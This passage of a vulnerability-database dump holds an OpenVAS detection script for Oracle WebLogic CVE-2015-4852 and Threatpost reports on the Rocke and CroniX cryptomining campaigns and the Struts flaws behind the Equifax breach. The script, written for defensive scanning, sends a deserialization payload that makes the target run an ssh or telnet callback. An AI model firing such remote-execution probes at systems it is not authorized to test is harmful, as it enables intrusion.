"2020-04-29T22:16:48", "description": "Oracle WebLogic Server is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2016-07-27T00:00:00", "type": 
"openvas", "title": "Oracle WebLogic Server Java Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310105829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105829", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Java Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105829\");\n script_cve_id(\"CVE-2015-4852\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-23T09:54:12+0000\");\n\n script_name(\"Oracle WebLogic Server Java Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code\n in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized java object which try to open a ssh connection to a random\n port on the scanner and then check for the tcp-syn packet from this connection.\");\n\n script_tag(name:\"insight\", value:\"Unsafe deserialization allows unauthenticated remote attackers to run\n arbitrary code on the Jboss server.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. 
Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-23 09:54:12 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-27 14:18:32 +0200 (Wed, 27 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n script_require_ports(\"Services/weblogic-t3\", 7001);\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service: \"weblogic-t3\" ) )\n exit( 0 );\n\nif( ! 
soc = open_sock_tcp( port ) )\n exit( 0 );\n\nreq = 't3 12.2.1\\n' +\n 'AS:255\\n' +\n 'HL:19\\n' +\n 'MS:10000000\\n' +\n 'PU:t3://us-l-breens:7001\\n\\n';\n\nsend( socket:soc, data:req );\nbuf = recv( socket:soc, length:128 );\n\nif( \"HELO\" >!< buf ) {\n close( soc );\n exit( 0 );\n}\n\npayload = raw_string( ... );\n\npayload += raw_string( ... );\n\nlport = rand() % 64512 + 1024;\n\nif( host_runs(\"Windows\") == \"yes\" )\n cmd = 'telnet ' + this_host() + ' ' + lport;\nelse\n cmd = 'ssh -q -i /dev/null -p ' + lport + ' ' + this_host();\n\nlen = raw_string( strlen( cmd ) );\n\npayload += len + cmd + raw_string( ... );\n\npayload += raw_string( ... );\n\nplen = raw_string( strlen( payload ) );\n\npayload = raw_string( 0x00,0x00,0x09 ) + plen + payload;\n\nfilter = 'tcp and src ' + get_host_ip() + ' and dst ' + 
this_host() + ' and dst port ' + lport;\n\nres = send_capture( socket:soc,\n data:payload,\n timeout:8,\n pcap_filter:filter );\n\nclose( soc );\n\nif( res ) {\n flags = get_tcp_element( tcp: res, element: \"th_flags\" );\n if( ( flags & TH_SYN ) ) {\n report = 'It was possible to execute the command `' + cmd + '` on the remote host. The TCP-SYN request to port ' + lport + ' was then successfully captured.';\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-05-30T05:51:17", "description": "Researchers are warning of a Chinese-language threat actor leveraging a wide array of Git repositories to infect vulnerable systems with Monero-based cryptomining malware.\n\nResearchers at Cisco Talos, who discovered the threat actor they call \u201cRocke\u201d, said they have been tracking the adversary since April as it continues to plant various Monero miners on vulnerable systems. Rocke\u2019s hallmark is the enlisting of toolkits that leverage Git repositories, HTTP File Servers (HFS) and a myriad of different payloads. The name Rocke was derived from the group\u2019s Monero wallet that includes \u201crocke@live.cn\u201d.\n\n\u201cRocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines,\u201d the research team said in a [post](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) Thursday. 
\u201cIt is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware.\u201d\n\nCisco Talos said it first spotted the threat actor in April 2018 when its malware was found in both Western and Chinese honeypots attempting to exploit an Apache Struts vulnerability.\n\nA user named \u201cc-000\u201d first downloaded several files to the researchers\u2019 Struts 2 honeypot from the Chinese repository site (Gitee.com), researchers said. At the same time another user named \u201cc-18\u201d pulled down files in similar activity from a GitLab.com repository page. The repositories on both Gitee and GitLab were identical, leading researchers to determine they were the same actor. The repositories also contained similar files such as an array of ELF executables, shell scripts, and text files. Each executed a variety of Monero-based cryptocurrency miners.\n\n\u201cAfter months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,\u201d wrote David Liebenberg, senior threat analyst, who authored the Cisco Talos report.\n\nResearchers said they found the same threat actor exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting a critical Java deserialization vulnerability in the Adobe ColdFusion platform (CVE-2017-3066).\n\n## Recent Campaigns\n\nAs recently as late July, researchers said they discovered another similar campaign on their Struts 2 honeypot. 
The honeypot received a wget request (a command for downloading files from the internet) for a file called \u201c0720.bin.\u201d When researchers did some digging and visited the host this file was located on, they discovered that it contained a slew of additional files, including shell scripts and cryptominers.\n\nThose files included an Executable and Linkable (ELF) file called \u201c3307.bin,\u201d a shell script called \u201ca7\u201d that kills a variety of processes related to other cryptomining malware, as well as shell scripts \u201clowerv2.sh\u201d and \u201crootv2.sh,\u201d which attempt to download and execute cryptomining malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/30151343/talos.png>)\n\nThey also found a file called \u201cconfig.json,\u201d which is a mining config file for open-source Monero miner XMRig. Another file, \u201cPools.txt,\u201d appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. 
Both miners have the same mining pool and wallet information.\n\nOther miners in the files include \u201cBashf,\u201d a variant of XMR-stak, and \u201cbashg,\u201d a variant of XMRig.\n\nFinally, Cisco Talos said it found a file dubbed \u201cTermsHost.exe,\u201d a PE 32 Monero miner, which researchers said can be purchased online for $14 and targets malicious actors: \u201cAdvertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \u2018Windows processes to bypass firewalls,'\u201d Liebenberg wrote.\n\nThe sample first grabs the config file \u201cxmr.txt\u201d containing the same configuration information as the previous files, from Rocke\u2019s command-and-control (C2) server, and then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool.\n\n\u201cIntriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system,\u201d researchers said.\n\n## Threat Actor\n\nLiebenberg said Cisco Talos was able to discover more about Rocke through several emails associated with the threat actor\u2019s MinerGate Monero wallet (rocke@live.cn and jxci@vip.qq.com): \u201cThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration,\u201d he said. \u201cSome of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food\u2026 It is possible that the \u2018jx\u2019 in jxci@vip.qq.com stands for Jiangxi. 
Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.\u201d\n\nThe payload is similar to one used by the [Iron Cybercrime Group](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>), Cisco Talos said: \u201cBoth Iron and Rocke\u2019s malware behave similarly, and reach out to similar infrastructure,\u201d they said. \u201cSo, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.\u201d\n\nLiebenberg pointed to cryptomining malware as increasing in popularity, with the Rocke threat actor an example of varying methods to download and execute various malware.\n\n\u201cDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating,\u201d they said. \u201cRocke\u2019s various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.\u201d\n", "cvss3": {}, "published": "2018-08-30T20:35:39", "type": "threatpost", "title": "New Threat Actor \u2018Rocke\u2019: A Rising Monero Cryptomining Menace", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-30T20:35:39", "id": "THREATPOST:E43EB029B562B5665C8385E16145288A", "href": "https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. 
website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday the company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. 
The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. 
Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. 
Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinians may be implicated as well. 
Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinians, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache 
Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. 
There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. 
Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. 
I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. 
[pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeatedly by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected, multiple lawsuits have been filed against the company in the wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. 
to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. 
The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. 
Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the process of taking structured data from one format and rebuilding it into an object. The process can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. 
This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. 
It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. 
Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. 
